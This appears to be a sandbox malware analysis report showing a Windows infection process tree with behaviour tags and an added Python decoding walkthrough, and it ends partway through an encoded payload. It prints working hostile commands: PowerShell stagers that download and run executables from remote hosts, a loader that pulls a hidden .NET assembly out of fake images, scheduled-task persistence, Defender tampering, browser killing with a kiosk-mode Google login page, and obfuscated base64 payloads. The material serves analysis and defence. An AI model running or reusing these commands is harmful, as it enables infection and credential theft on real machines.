C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:280
-
-
-
-
-
-
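The PowerShell stages in this subtree, worked through as an added example (the code here is the editor's, not the report's or the malware's). The tree shows two distinct layers on top of the plain DownloadFile one-liners used by the mshta steps: first a UTF-16LE base64 string in which every "A" has been swapped for "@", which the decoded command at the end of the long line undoes with .replace('@','A') before [Text.Encoding]::Unicode.GetString; then a second-stage script that fetches an "image" from two URLs, cuts out whatever sits between <<BASE64_START>> and <<BASE64_END>>, base64-decodes it and hands the bytes to Assembly.Load. The helpers below reproduce each step on constructed input so they run offline; the only page-derived input is the DownloadFile command line, used to show that $env:temp+'NAME' with no backslash is plain string concatenation, which is why the dropped file appears as ...\Local\TempPHIP...EXE rather than inside Temp. Treating the first Invoke() argument as a reversed URL fragment is the editor's assumption: the report does not show the loaded assembly, so what it does with that string is not visible here.

```python
import base64
import re

START_MARK, END_MARK = b"<<BASE64_START>>", b"<<BASE64_END>>"


def extract_download_stager(cmdline: str, temp_dir: str = r"C:\Users\Admin\AppData\Local\Temp"):
    """URL and drop path from the WebClient.DownloadFile one-liner. $env:temp is concatenated
    exactly as written, so a name without a leading backslash lands next to Temp, not in it."""
    m = re.search(r"\$d=\$env:temp\+'([^']*)'.*?DownloadFile\('([^']+)',\s*\$d\)", cmdline, re.I | re.S)
    if not m:
        return None
    return {"url": m.group(2), "drop_path": temp_dir + m.group(1)}


def obfuscate_like_sample(script: str) -> str:
    """Layer 1 as the report shows it: UTF-16LE text -> base64 -> every 'A' swapped for '@'."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", "@")


def decode_at_obfuscated(blob: str) -> str:
    """Inverse of layer 1, the same thing the page's PowerShell does with .replace('@','A') and
    [Text.Encoding]::Unicode. Whitespace is dropped first so a line-wrapped copy still decodes."""
    compact = "".join(blob.split()).replace("@", "A")
    return base64.b64decode(compact, validate=True).decode("utf-16-le")


def extract_marked_payload(data: bytes):
    """Layer 2: the base64 between the two markers inside the downloaded 'image', as bytes."""
    start = data.find(START_MARK)
    if start < 0:
        return None
    start += len(START_MARK)
    end = data.find(END_MARK, start)
    if end < 0:
        return None
    return base64.b64decode(data[start:end].strip())


def looks_like_pe(payload) -> bool:
    """The stager passes the bytes to Assembly.Load, so a managed PE ('MZ') is what to expect."""
    return payload is not None and payload[:2] == b"MZ"


def reverse_argument(arg: str) -> str:
    """Assumption (editor's, not shown in the report): the loaded assembly flips this back."""
    return arg[::-1].strip()


# Constructed samples. PAGE_STAGER is the mshta -> powershell command line from this tree;
# everything else is synthetic so the block runs offline.
PAGE_STAGER = (r"powershell.exe -WindowStyle Hidden $d=$env:temp+'PHIPCPMRGKMJUQGTHBUBC89AKNPGNCYQ.EXE';"
               r"(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;")
SAMPLE_SCRIPT = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $x = 1"
SAMPLE_OBFUSCATED = obfuscate_like_sample(SAMPLE_SCRIPT)
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"   # placeholder bytes, not a real binary
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0 JPEG-looking filler " + START_MARK
                + base64.b64encode(FAKE_PE) + END_MARK + b" trailing filler")
```

For the real artefact, pass the full "$dosigo" string to decode_at_obfuscated (the wrapping in this page copy does not matter) and the bytes of whichever of the two download URLs answered to extract_marked_payload; if looks_like_pe is true, the result is the .NET loader the second stage reflects into memory, and the argument tuple in the Invoke() call is what to hand to the next analyst.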
C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"C:\Users\Admin\AppData\Local\Temp\10144510101\OSKDbmy.exe"7⤵
- Executes dropped EXE
PID:2296 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win7-x64&apphost_version=6.0.16&gui=true8⤵
- System Time Discovery
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1960 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1960 CREDAT:275457 /prefetch:29⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10147600101\3b9ee8ffbb.exe"C:\Users\Admin\AppData\Local\Temp\10147600101\3b9ee8ffbb.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn fOXUema5SkW /tr "mshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
PID:1364 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn fOXUema5SkW /tr "mshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2496
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\0pEgp4leU.hta8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1552 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Users\Admin\AppData\Local\TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE"C:\Users\Admin\AppData\Local\TempXV1OBJEDSIJF28CVP2PRMRQXF8C2XOYB.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10147610121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
PID:1580 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:684 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "BlPWgmaPtNx" /tr "mshta \"C:\Temp\T914aIuR7.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2232
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\T914aIuR7.hta"8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:280 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148390101\e267fb67b5.exe"C:\Users\Admin\AppData\Local\Temp\10148390101\e267fb67b5.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 12048⤵
- Loads dropped DLL
- Program crash
PID:2772
-
-
-
C:\Users\Admin\AppData\Local\Temp\10148400101\a221fd437d.exe"C:\Users\Admin\AppData\Local\Temp\10148400101\a221fd437d.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
[depth 7] C:\Users\Admin\AppData\Local\Temp\10148410101\156f54f6b5.exe (PID 1360)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148410101\156f54f6b5.exe"
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

[depth 8] C:\Windows\SysWOW64\taskkill.exe (PID 2496)
  cmdline: taskkill /F /IM firefox.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\SysWOW64\taskkill.exe (PID 2208)
  cmdline: taskkill /F /IM chrome.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\SysWOW64\taskkill.exe (PID 2648)
  cmdline: taskkill /F /IM msedge.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\SysWOW64\taskkill.exe (PID 2440)
  cmdline: taskkill /F /IM opera.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Windows\SysWOW64\taskkill.exe (PID 2456)
  cmdline: taskkill /F /IM brave.exe /T
  - System Location Discovery: System Language Discovery
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

[depth 8] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2684)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

[depth 9] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2608)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2392)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.0.1884108428\65484423" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c27d9d4d-1f28-4626-9a6b-8b799e8c01b5} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 1324 4304758 gpu

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2400)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.1.2050025687\586108651" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78ad92ec-6b8d-40f5-9d5f-fdf6237750b3} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 1512 43d1058 socket

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 1848)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.2.1452751177\1730073598" -childID 1 -isForBrowser -prefsHandle 2020 -prefMapHandle 2036 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25930cb2-12d9-4769-a9fd-f2870fe037c1} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 2012 10460458 tab

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2380)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.3.732523778\317768961" -childID 2 -isForBrowser -prefsHandle 2768 -prefMapHandle 2764 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5968bf29-4b51-4918-a44d-f85909a03e61} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 2796 1d8e1a58 tab

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 1936)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.4.687199415\1043258020" -childID 3 -isForBrowser -prefsHandle 3680 -prefMapHandle 3684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbefeca1-e9f8-411d-985c-616d597774bc} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3708 1f9ebb58 tab

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 2940)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.5.52533189\1126919164" -childID 4 -isForBrowser -prefsHandle 3816 -prefMapHandle 3820 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3aa12d9-d751-4a46-972f-c7eb66f2e2a0} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3804 1fed0b58 tab

[depth 10] C:\Program Files\Mozilla Firefox\firefox.exe (PID 876)
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2608.6.1806945454\1419939669" -childID 5 -isForBrowser -prefsHandle 3984 -prefMapHandle 3988 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 580 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26b2cd31-4861-448a-b911-ef8da3a8e1af} 2608 "\\.\pipe\gecko-crash-server-pipe.2608" 3972 1fed1758 tab
[depth 7] C:\Users\Admin\AppData\Local\Temp\10148420101\30c6dab708.exe (PID 3372)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148420101\30c6dab708.exe"
  - Modifies Windows Defender DisableAntiSpyware settings
  - Modifies Windows Defender Real-time Protection settings
  - Modifies Windows Defender TamperProtection settings
  - Modifies Windows Defender notification settings
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Windows security modification
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe (PID 3796)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148430101\HHPgDSI.exe"
  - Executes dropped EXE

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe (PID 3356)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148450101\HHPgDSI.exe"
  - Executes dropped EXE

[depth 7] C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe (PID 872)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\10148460101\m4mrV1B.exe"
  - Executes dropped EXE
  - Adds Run key to start application

[depth 8] C:\Windows\system32\cmd.exe (PID 1680)
  cmdline: cmd.exe /c 67cc62a429f2f.vbs

[depth 9] C:\Windows\System32\WScript.exe (PID 3840)
  cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"

[depth 10] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3868)
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4